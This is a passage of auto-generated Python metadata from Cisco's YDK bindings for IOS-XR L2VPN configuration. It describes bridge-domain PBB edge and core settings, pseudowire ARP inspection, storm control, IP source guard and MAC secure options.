_MetaInfoClassMember('pbb-edge-dhcp-profile', REFERENCE_CLASS, 'PbbEdgeDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_edge_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_edge_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edge-mac', REFERENCE_CLASS, 'PbbEdgeMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbEdgeMac',
[], [],
''' MAC configuration commands
''',
'pbb_edge_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-static-mac-mappings', REFERENCE_CLASS, 'PbbStaticMacMappings' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge.PbbStaticMacMappings',
[], [],
''' PBB Static Mac Address Mapping Table
''',
'pbb_static_mac_mappings',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('unknown-unicast-bmac', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Configure Unknown Unicast BMAC address
for PBB Edge Port
''',
'unknown_unicast_bmac',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edge',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
False,
[
_MetaInfoClassMember('pbb-edge', REFERENCE_LIST, 'PbbEdge' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges.PbbEdge',
[], [],
''' Configure BD as PBB Edge with ISID and
associated PBB Core BD
''',
'pbb_edge',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-edges',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging-time', ATTRIBUTE, 'int' , None, None,
[('300', '30000')], [],
''' Mac Aging Time
''',
'pbb_core_mac_aging_time',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-aging-type', REFERENCE_ENUM_CLASS, 'MacAgingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacAgingEnum',
[], [],
''' MAC address aging type
''',
'pbb_core_mac_aging_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-aging',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
False,
[
_MetaInfoClassMember('pbb-core-mac-limit-action', REFERENCE_ENUM_CLASS, 'MacLimitActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLimitActionEnum',
[], [],
''' MAC address limit enforcement action
''',
'pbb_core_mac_limit_action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-max', ATTRIBUTE, 'int' , None, None,
[('0', '4294967295')], [],
''' Number of MAC addresses after which MAC
limit action is taken
''',
'pbb_core_mac_limit_max',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit-notif', REFERENCE_ENUM_CLASS, 'MacNotificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacNotificationEnum',
[], [],
''' MAC address limit notification action
''',
'pbb_core_mac_limit_notif',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac-limit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
False,
[
_MetaInfoClassMember('pbb-core-mac-aging', REFERENCE_CLASS, 'PbbCoreMacAging' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacAging',
[], [],
''' MAC-Aging configuration commands
''',
'pbb_core_mac_aging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-learning', REFERENCE_ENUM_CLASS, 'MacLearnEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacLearnEnum',
[], [],
''' Enable Mac Learning
''',
'pbb_core_mac_learning',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac-limit', REFERENCE_CLASS, 'PbbCoreMacLimit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac.PbbCoreMacLimit',
[], [],
''' MAC-Limit configuration commands
''',
'pbb_core_mac_limit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-mac',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
False,
[
_MetaInfoClassMember('pbb-core-evi', REFERENCE_LIST, 'PbbCoreEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis.PbbCoreEvi',
[], [],
''' PBB Core EVI
''',
'pbb_core_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core-dhcp-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
False,
[
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Bridge Domain PBB Core
Configuration
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-dhcp-profile', REFERENCE_CLASS, 'PbbCoreDhcpProfile' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreDhcpProfile',
[], [],
''' Attach a DHCP profile
''',
'pbb_core_dhcp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-evis', REFERENCE_CLASS, 'PbbCoreEvis' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreEvis',
[], [],
''' PBB Core EVI Table
''',
'pbb_core_evis',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-igmp-profile', ATTRIBUTE, 'str' , None, None,
[(0, 32)], [],
''' Attach a IGMP Snooping profile
''',
'pbb_core_igmp_profile',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mac', REFERENCE_CLASS, 'PbbCoreMac' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore.PbbCoreMac',
[], [],
''' MAC configuration commands
''',
'pbb_core_mac',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-core-mmrp-flood-optimization', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enabling MMRP PBB-VPLS Flood Optimization
''',
'pbb_core_mmrp_flood_optimization',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('vlan-id', ATTRIBUTE, 'int' , None, None,
[('1', '4094')], [],
''' VLAN ID to push
''',
'vlan_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pbb-core',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb',
False,
[
_MetaInfoClassMember('pbb-core', REFERENCE_CLASS, 'PbbCore' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbCore',
[], [],
''' PBB Core
''',
'pbb_core',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pbb-edges', REFERENCE_CLASS, 'PbbEdges' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainPbb.PbbEdges',
[], [],
''' PBB Edge
''',
'pbb_edges',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-pbb',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
False,
[
_MetaInfoClassMember('eviid', ATTRIBUTE, 'int' , None, None,
[('1', '4294967295')], [],
''' Ethernet VPN ID
''',
'eviid',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evi',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis',
False,
[
_MetaInfoClassMember('bridge-domain-evi', REFERENCE_LIST, 'BridgeDomainEvi' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BridgeDomainEvis.BridgeDomainEvi',
[], [],
''' Bridge Domain EVI
''',
'bridge_domain_evi',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bridge-domain-evis',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
False,
[
_MetaInfoClassMember('destination-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Destination MAC Verification
''',
'destination_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('ipv4-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' IPv4 Verification
''',
'ipv4_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('source-mac-verification', REFERENCE_ENUM_CLASS, 'L2VpnVerificationEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnVerificationEnum',
[], [],
''' Source MAC Verification
''',
'source_mac_verification',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai-address-validation',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic ARP Inspection
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable Access Pseudowire Dynamic ARP
Inspection
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pseudowire-dai-address-validation', REFERENCE_CLASS, 'PseudowireDaiAddressValidation' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireDai.PseudowireDaiAddressValidation',
[], [],
''' Address Validation
''',
'pseudowire_dai_address_validation',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-dai',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
False,
[
_MetaInfoClassMember('kbits-per-sec', ATTRIBUTE, 'int' , None, None,
[('64', '1280000')], [],
''' Kilobits Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'kbits_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('pkts-per-sec', ATTRIBUTE, 'int' , None, None,
[('1', '160000')], [],
''' Packets Per Second, PktsPerSec and KbitsPerSec
cannot be configured together
''',
'pkts_per_sec',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'storm-control-unit',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
False,
[
_MetaInfoClassMember('sctype', REFERENCE_ENUM_CLASS, 'StormControlEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'StormControlEnum',
[], [],
''' Storm Control Type
''',
'sctype',
'Cisco-IOS-XR-l2vpn-cfg', True),
_MetaInfoClassMember('storm-control-unit', REFERENCE_CLASS, 'StormControlUnit' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType.StormControlUnit',
[], [],
''' Specify units for Storm Control Configuration
''',
'storm_control_unit',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-type',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes',
False,
[
_MetaInfoClassMember('bdpw-storm-control-type', REFERENCE_LIST, 'BdpwStormControlType' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdpwStormControlTypes.BdpwStormControlType',
[], [],
''' Storm Control Type
''',
'bdpw_storm_control_type',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bdpw-storm-control-types',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireProfile',
False,
[
_MetaInfoClassMember('dhcp-snooping-id', ATTRIBUTE, 'str' , None, None,
[], [],
''' Disable DHCP snooping
''',
'dhcp_snooping_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('profile-id', REFERENCE_ENUM_CLASS, 'InterfaceProfileEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'InterfaceProfileEnum',
[], [],
''' Set the snooping profile
''',
'profile_id',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-profile',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
False,
[
_MetaInfoClassMember('address', ATTRIBUTE, 'str' , None, None,
[], ['[0-9a-fA-F]{2}(:[0-9a-fA-F]{2}){5}'],
''' Static MAC address
''',
'address',
'Cisco-IOS-XR-l2vpn-cfg', True),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-address',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses',
False,
[
_MetaInfoClassMember('bd-pw-static-mac-address', REFERENCE_LIST, 'BdPwStaticMacAddress' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.BdPwStaticMacAddresses.BdPwStaticMacAddress',
[], [],
''' Static Mac Address Configuration
''',
'bd_pw_static_mac_address',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'bd-pw-static-mac-addresses',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireIpSourceGuard',
False,
[
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable Dynamic IP source guard
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable IP Source Guard
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' Logging Type
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-ip-source-guard',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure' : {
'meta_info' : _MetaInfoClass('L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacSecure',
False,
[
_MetaInfoClassMember('action', REFERENCE_ENUM_CLASS, 'MacSecureActionEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'MacSecureActionEnum',
[], [],
''' MAC secure enforcement action
''',
'action',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('disable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Disable L2 Pseudowire MAC Secure
''',
'disable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('enable', ATTRIBUTE, 'Empty' , None, None,
[], [],
''' Enable MAC Secure
''',
'enable',
'Cisco-IOS-XR-l2vpn-cfg', False),
_MetaInfoClassMember('logging', REFERENCE_ENUM_CLASS, 'L2VpnLoggingEnum' , 'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg', 'L2VpnLoggingEnum',
[], [],
''' MAC Secure Logging
''',
'logging',
'Cisco-IOS-XR-l2vpn-cfg', False),
],
'Cisco-IOS-XR-l2vpn-cfg',
'pseudowire-mac-secure',
_yang_ns._namespaces['Cisco-IOS-XR-l2vpn-cfg'],
'ydk.models.cisco_ios_xr.Cisco_IOS_XR_l2vpn_cfg'
),
},
'L2Vpn.Database.BridgeDomainGroups.BridgeDomainGroup.BridgeDomains.BridgeDomain.BdPseudowires.BdPseudowire.PseudowireMac.PseudowireMacAging' : {
